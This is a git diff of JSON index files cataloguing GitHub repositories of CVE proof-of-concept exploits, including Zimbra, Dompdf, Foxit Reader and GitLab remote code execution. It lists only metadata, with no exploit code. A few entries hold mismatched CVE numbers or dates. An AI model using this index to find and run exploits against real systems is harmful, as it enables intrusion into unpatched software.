"login": "touchmycrazyredhat", + "id": 112880228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112880228?v=4", + "html_url": "https:\/\/github.com\/touchmycrazyredhat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/touchmycrazyredhat\/CVE-2022-27925-Revshell", + "description": null, + "fork": false, + "created_at": "2022-09-17T22:24:32Z", + "updated_at": "2024-08-12T20:27:07Z", + "pushed_at": "2022-09-17T23:14:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 541211049, + "name": "Zimbra", + "full_name": "jam620\/Zimbra", + "owner": { + "login": "jam620", + "id": 17382838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17382838?v=4", + "html_url": "https:\/\/github.com\/jam620", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jam620\/Zimbra", + "description": "CVE-2022-27925", + "fork": false, + "created_at": "2022-09-25T15:09:49Z", + "updated_at": "2024-12-09T12:28:12Z", + "pushed_at": "2022-09-25T15:10:50Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 543986246, + "name": "CVE-2022-27925", + "full_name": "Inplex-sys\/CVE-2022-27925", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-27925", + "description": "A loader for zimbra 2022 rce (cve-2022-27925)", + "fork": false, + "created_at": "2022-10-01T10:33:55Z", + "updated_at": "2024-06-26T09:43:07Z", + "pushed_at": "2024-02-20T23:39:40Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "education", + "poc", + "rce", + "zimbra-exploit", + "zimbra-rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554214326, + "name": "CVE-2022-27925-PoC", + "full_name": "onlyHerold22\/CVE-2022-27925-PoC", + "owner": { + "login": "onlyHerold22", + "id": 115049570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115049570?v=4", + "html_url": "https:\/\/github.com\/onlyHerold22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onlyHerold22\/CVE-2022-27925-PoC", + "description": null, + "fork": false, + "created_at": "2022-10-19T12:46:48Z", + "updated_at": "2022-10-19T12:47:05Z", + "pushed_at": "2022-10-19T12:47:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844643090, + "name": "CVE-2022-27925", + "full_name": "sanan2004\/CVE-2022-27925", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2022-27925", + "description": "PoC", + "fork": false, + "created_at": "2024-08-19T17:17:24Z", + "updated_at": "2024-08-21T09:20:35Z", + "pushed_at": "2024-08-19T17:17:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27927.json b/2022/CVE-2022-27927.json new file mode 100644 index 0000000000..ee31643b6a --- /dev/null +++ b/2022/CVE-2022-27927.json @@ -0,0 +1,33 @@ +[ + { + "id": 474575948, + "name": "Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "full_name": "erengozaydin\/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated", + "description": "CVE-2022-27927", + "fork": false, + "created_at": "2022-03-27T08:17:47Z", + "updated_at": "2022-04-19T14:13:18Z", + "pushed_at": "2022-03-28T07:30:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-27997.json b/2022/CVE-2022-27997.json new file mode 100644 index 0000000000..a693d095e7 --- /dev/null +++ b/2022/CVE-2022-27997.json @@ -0,0 +1,33 @@ +[ + { + "id": 686590287, + "name": "CVE-2023-27997", + "full_name": "Cyb3rEnthusiast\/CVE-2023-27997", + "owner": { + "login": "Cyb3rEnthusiast", + "id": 143934696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143934696?v=4", + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rEnthusiast\/CVE-2023-27997", + "description": "How to get access via CVE-2022-27997", + "fork": false, + "created_at": "2023-09-03T10:01:24Z", + "updated_at": "2023-09-10T10:48:40Z", + "pushed_at": "2023-09-09T09:22:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28079.json b/2022/CVE-2022-28079.json new file mode 100644 index 0000000000..aff9a2a5a8 --- /dev/null +++ b/2022/CVE-2022-28079.json @@ -0,0 +1,33 @@ +[ + { + "id": 475749198, + "name": "College-Management-System-course_code-SQL-Injection-Authenticated", + "full_name": "erengozaydin\/College-Management-System-course_code-SQL-Injection-Authenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/College-Management-System-course_code-SQL-Injection-Authenticated", + "description": "CVE-2022-28079", + "fork": false, + "created_at": "2022-03-30T06:32:38Z", + "updated_at": "2022-05-05T17:25:32Z", + "pushed_at": "2022-03-30T06:33:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28080.json b/2022/CVE-2022-28080.json new file mode 100644 index 0000000000..1aa49d82d2 --- /dev/null +++ b/2022/CVE-2022-28080.json @@ -0,0 +1,33 @@ +[ + { + "id": 475750736, + "name": "Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "full_name": "erengozaydin\/Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "owner": { + "login": "erengozaydin", + "id": 4093021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4093021?v=4", + "html_url": "https:\/\/github.com\/erengozaydin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erengozaydin\/Royal-Event-Management-System-todate-SQL-Injection-Authenticated", + "description": "CVE-2022-28080", + "fork": false, + "created_at": "2022-03-30T06:37:48Z", + "updated_at": "2022-05-05T17:26:09Z", + "pushed_at": "2022-03-30T06:38:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28117.json b/2022/CVE-2022-28117.json index 2149d50d23..da9931e2c8 100644 --- a/2022/CVE-2022-28117.json +++ b/2022/CVE-2022-28117.json @@ -29,5 +29,36 @@ "watchers": 2, "score": 0, "subscribers_count": 1 + }, + { + "id": 735816901, + "name": "POC-CVE-2022-28117", + "full_name": "kimstars\/POC-CVE-2022-28117", + "owner": { + "login": "kimstars", + "id": 23279002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23279002?v=4", + "html_url": "https:\/\/github.com\/kimstars", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kimstars\/POC-CVE-2022-28117", + "description": null, + "fork": false, + "created_at": "2023-12-26T06:51:54Z", + "updated_at": "2024-01-06T15:15:30Z", + "pushed_at": "2023-12-26T06:52:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-28118.json b/2022/CVE-2022-28118.json new file mode 100644 index 0000000000..0b25e80b1d --- /dev/null +++ b/2022/CVE-2022-28118.json @@ -0,0 +1,33 @@ +[ + { + "id": 372129057, + "name": "SSCMS-PluginShell", + "full_name": "Richard-Tang\/SSCMS-PluginShell", + "owner": { + "login": "Richard-Tang", + "id": 30547741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30547741?v=4", + "html_url": "https:\/\/github.com\/Richard-Tang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Richard-Tang\/SSCMS-PluginShell", + "description": "CVE-2022-28118", + "fork": false, + "created_at": "2021-05-30T05:14:19Z", + "updated_at": "2024-08-12T20:13:27Z", + "pushed_at": "2022-03-27T11:36:49Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28171.json b/2022/CVE-2022-28171.json new file mode 100644 index 0000000000..4d6d4f2720 --- /dev/null +++ b/2022/CVE-2022-28171.json @@ -0,0 +1,64 @@ +[ + { + "id": 666967366, + "name": "CVE-2022-28171-POC", + "full_name": "NyaMeeEain\/CVE-2022-28171-POC", + "owner": { + "login": "NyaMeeEain", + "id": 28331671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28331671?v=4", + "html_url": "https:\/\/github.com\/NyaMeeEain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NyaMeeEain\/CVE-2022-28171-POC", + "description": null, + "fork": false, + "created_at": "2023-07-16T07:30:22Z", + "updated_at": "2024-10-13T23:14:31Z", + "pushed_at": "2023-08-09T05:14:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894493486, + "name": "hikvision_probe", + "full_name": "aengussong\/hikvision_probe", + "owner": { + "login": "aengussong", + "id": 26045876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26045876?v=4", + "html_url": "https:\/\/github.com\/aengussong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aengussong\/hikvision_probe", + "description": "Identify hikvision ip and probe for cve-s (CVE-2017-7921, CVE-2022-28171, CVE-2021-36260)", + "fork": false, + "created_at": "2024-11-26T13:02:18Z", + "updated_at": "2024-11-26T13:23:21Z", + "pushed_at": "2024-11-26T13:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28219.json b/2022/CVE-2022-28219.json index 61241f7c79..ac017b07ac 100644 --- a/2022/CVE-2022-28219.json +++ b/2022/CVE-2022-28219.json @@ -29,5 +29,67 @@ "watchers": 44, "score": 0, "subscribers_count": 4 + }, + { + "id": 509605278, + "name": "manageengine-auditad-cve-2022-28219", + "full_name": "rbowes-r7\/manageengine-auditad-cve-2022-28219", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/manageengine-auditad-cve-2022-28219", + "description": null, + "fork": false, + "created_at": "2022-07-01T22:40:46Z", + "updated_at": "2023-05-08T09:56:02Z", + "pushed_at": "2022-07-05T22:13:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 518384320, + "name": "CVE-2022-28219-Like", + "full_name": "aeifkz\/CVE-2022-28219-Like", + "owner": { + "login": "aeifkz", + "id": 2063610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2063610?v=4", + "html_url": "https:\/\/github.com\/aeifkz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeifkz\/CVE-2022-28219-Like", + "description": "建立一個概念類似 CVE-2022-28219 的測試環境", + "fork": false, + "created_at": "2022-07-27T09:03:10Z", + "updated_at": "2022-12-15T00:29:34Z", + "pushed_at": "2022-10-31T12:55:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-28282.json b/2022/CVE-2022-28282.json new file mode 100644 index 0000000000..587c53db12 --- /dev/null +++ b/2022/CVE-2022-28282.json @@ -0,0 +1,33 @@ +[ + { + "id": 541124972, + "name": "CVE-2022-28282-firefox", + "full_name": "bb33bb\/CVE-2022-28282-firefox", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-28282-firefox", + "description": "PoC for CVE-2022-28282", + "fork": false, + "created_at": "2022-09-25T09:51:21Z", + "updated_at": "2022-09-25T13:12:44Z", + "pushed_at": "2022-09-25T09:30:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28346.json b/2022/CVE-2022-28346.json index d232377184..d433f08346 100644 --- a/2022/CVE-2022-28346.json +++ b/2022/CVE-2022-28346.json @@ -91,5 +91,67 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 609374925, + "name": "CVE-2022-28346", + "full_name": "vincentinttsh\/CVE-2022-28346", + "owner": { + "login": "vincentinttsh", + "id": 14941597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14941597?v=4", + "html_url": "https:\/\/github.com\/vincentinttsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vincentinttsh\/CVE-2022-28346", + "description": "An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.", + "fork": false, + "created_at": "2023-03-04T01:43:58Z", + "updated_at": "2022-08-24T08:06:59Z", + "pushed_at": "2022-05-15T00:53:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745257468, + "name": "CVE-2022-28346", + "full_name": "kamal-marouane\/CVE-2022-28346", + "owner": { + "login": "kamal-marouane", + "id": 110986028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110986028?v=4", + "html_url": "https:\/\/github.com\/kamal-marouane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamal-marouane\/CVE-2022-28346", + "description": "A flaw was found in the Django package, which leads to a SQL injection. This flaw allows an attacker using a crafted dictionary containing malicious SQL queries to compromise the database completely.", + "fork": false, + "created_at": "2024-01-19T00:15:59Z", + "updated_at": "2024-01-20T05:30:50Z", + "pushed_at": "2024-01-19T04:00:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-28368.json b/2022/CVE-2022-28368.json new file mode 100644 index 0000000000..4ac9b2a603 --- /dev/null +++ b/2022/CVE-2022-28368.json @@ -0,0 +1,100 @@ +[ + { + "id": 601030910, + "name": "CVE-2022-28368", + "full_name": "rvizx\/CVE-2022-28368", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2022-28368", + "description": "Dompdf RCE PoC Exploit - CVE-2022-28368", + "fork": false, + "created_at": "2023-02-13T08:10:00Z", + "updated_at": "2024-08-01T15:21:21Z", + "pushed_at": "2024-01-19T04:35:32Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-28368", + "cybersecurity", + "dompdf", + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633796587, + "name": "CVE-2022-28368-handler", + "full_name": "That-Guy-Steve\/CVE-2022-28368-handler", + "owner": { + "login": "That-Guy-Steve", + "id": 130059785, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130059785?v=4", + "html_url": "https:\/\/github.com\/That-Guy-Steve", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/That-Guy-Steve\/CVE-2022-28368-handler", + "description": "This repository contains a python script that will handle the majority of the dompdf cached font exploit (CVE-2022-28368), all you need to do is create the request", + "fork": false, + "created_at": "2023-04-28T09:49:05Z", + "updated_at": "2023-04-28T12:42:28Z", + "pushed_at": "2023-04-28T12:57:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637435384, + "name": "Dompdf-Exploit-RCE", + "full_name": "Henryisnotavailable\/Dompdf-Exploit-RCE", + "owner": { + "login": "Henryisnotavailable", + "id": 112469853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112469853?v=4", + "html_url": "https:\/\/github.com\/Henryisnotavailable", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henryisnotavailable\/Dompdf-Exploit-RCE", + "description": "An exploit script for CVE-2022-28368 designed to make exploitation less annoying, made for a HTB machine", + "fork": false, + "created_at": "2023-05-07T14:49:38Z", + "updated_at": "2023-05-07T14:51:35Z", + "pushed_at": "2023-05-07T15:39:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28381.json b/2022/CVE-2022-28381.json new file mode 100644 index 0000000000..8e48f31d9c --- /dev/null +++ b/2022/CVE-2022-28381.json @@ -0,0 +1,33 @@ +[ + { + "id": 528577166, + "name": "CVE-2022-28381_PoC", + "full_name": "DShankle\/CVE-2022-28381_PoC", + "owner": { + "login": "DShankle", + "id": 44985044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4", + "html_url": "https:\/\/github.com\/DShankle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DShankle\/CVE-2022-28381_PoC", + "description": null, + "fork": false, + "created_at": "2022-08-24T20:04:58Z", + "updated_at": "2022-08-29T17:20:43Z", + "pushed_at": "2022-08-24T20:05:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-28672.json b/2022/CVE-2022-28672.json new file mode 100644 index 0000000000..a866c595ef --- /dev/null +++ b/2022/CVE-2022-28672.json @@ -0,0 +1,75 @@ +[ + { + "id": 573557575, + "name": "CVE-2022-28672", + "full_name": "hacksysteam\/CVE-2022-28672", + "owner": { + "login": "hacksysteam", + "id": 4098538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4098538?v=4", + "html_url": "https:\/\/github.com\/hacksysteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacksysteam\/CVE-2022-28672", + "description": "Foxit PDF Reader Remote Code Execution Exploit", + "fork": false, + "created_at": "2022-12-02T18:52:20Z", + "updated_at": "2024-12-17T03:47:23Z", + "pushed_at": "2023-12-05T12:22:45Z", + "stargazers_count": 116, + "watchers_count": 116, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "aslr-bypass", + "cve-2022-28672", + "dep-bypass", + "exploit", + "foxit", + "foxitreader", + "jit", + "jit-spraying", + "rce", + "use-after-free" + ], + "visibility": "public", + "forks": 25, + "watchers": 116, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584971290, + "name": "CVE-2022-28672", + "full_name": "fastmo\/CVE-2022-28672", + "owner": { + "login": "fastmo", + "id": 53575270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53575270?v=4", + "html_url": "https:\/\/github.com\/fastmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fastmo\/CVE-2022-28672", + "description": " CVE-2022-28672 Vulnerabilidad Foxit PDF Reader - UaF - RCE - JIT Spraying", + "fork": false, + "created_at": "2023-01-04T01:39:04Z", + "updated_at": "2023-01-04T02:03:45Z", + "pushed_at": "2023-01-04T02:04:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2884.json b/2022/CVE-2022-2884.json new file mode 100644 index 0000000000..affc41450c --- /dev/null +++ b/2022/CVE-2022-2884.json @@ -0,0 +1,41 @@ +[ + { + "id": 581263876, + "name": "gitlab_rce_cve-2022-2884", + "full_name": "m3ssap0\/gitlab_rce_cve-2022-2884", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/gitlab_rce_cve-2022-2884", + "description": "Exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.", + "fork": false, + "created_at": "2022-12-22T17:52:26Z", + "updated_at": "2024-12-27T03:00:50Z", + "pushed_at": "2022-12-26T09:49:16Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-2884", + "exploit", + "gitlab", + "security", + "security-tools", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29063.json b/2022/CVE-2022-29063.json new file mode 100644 index 0000000000..f2d9e23e3c --- /dev/null +++ b/2022/CVE-2022-29063.json @@ -0,0 +1,40 @@ +[ + { + "id": 732796706, + "name": "CVE-2022-29063", + "full_name": "mbadanoiu\/CVE-2022-29063", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-29063", + "description": "CVE-2022-29063: Java Deserialization via RMI Connection in Apache OfBiz", + "fork": false, + "created_at": "2023-12-17T21:11:30Z", + "updated_at": "2024-03-05T06:22:06Z", + "pushed_at": "2023-12-17T21:22:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2022-29063", + "cves", + "deserialization", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29072.json b/2022/CVE-2022-29072.json index 0eae1c33dc..6676999af6 100644 --- a/2022/CVE-2022-29072.json +++ b/2022/CVE-2022-29072.json @@ -95,5 +95,67 @@ "watchers": 8, "score": 0, "subscribers_count": 2 + }, + { + "id": 580447745, + "name": "7-Zip.chm-Mitigation", + "full_name": "Phantomiman\/7-Zip.chm-Mitigation", + "owner": { + "login": "Phantomiman", + "id": 119011920, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119011920?v=4", + "html_url": "https:\/\/github.com\/Phantomiman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phantomiman\/7-Zip.chm-Mitigation", + "description": "7-Zip CVE-2022-29072 Mitigation - CHM file - This script detects if the .chm file exists and removes it.", + "fork": false, + "created_at": "2022-12-20T15:30:12Z", + "updated_at": "2023-02-19T08:58:49Z", + "pushed_at": "2022-12-20T16:00:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 798859541, + "name": "CVE-2022-29072", + "full_name": "rasan2001\/CVE-2022-29072", + "owner": { + "login": "rasan2001", + "id": 156652838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156652838?v=4", + "html_url": "https:\/\/github.com\/rasan2001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rasan2001\/CVE-2022-29072", + "description": null, + "fork": false, + "created_at": "2024-05-10T16:13:15Z", + "updated_at": "2024-05-10T16:13:36Z", + "pushed_at": "2024-05-10T16:13:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-29078.json b/2022/CVE-2022-29078.json new file mode 100644 index 0000000000..9b5f621b51 --- /dev/null +++ b/2022/CVE-2022-29078.json @@ -0,0 +1,132 @@ +[ + { + "id": 515929949, + "name": "CVE-2022-29078", + "full_name": "miko550\/CVE-2022-29078", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-29078", + "description": "vuln ejs 3.1.6 docker", + "fork": false, + "created_at": "2022-07-20T10:10:01Z", + "updated_at": "2023-09-13T10:20:07Z", + "pushed_at": "2022-09-07T12:43:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + 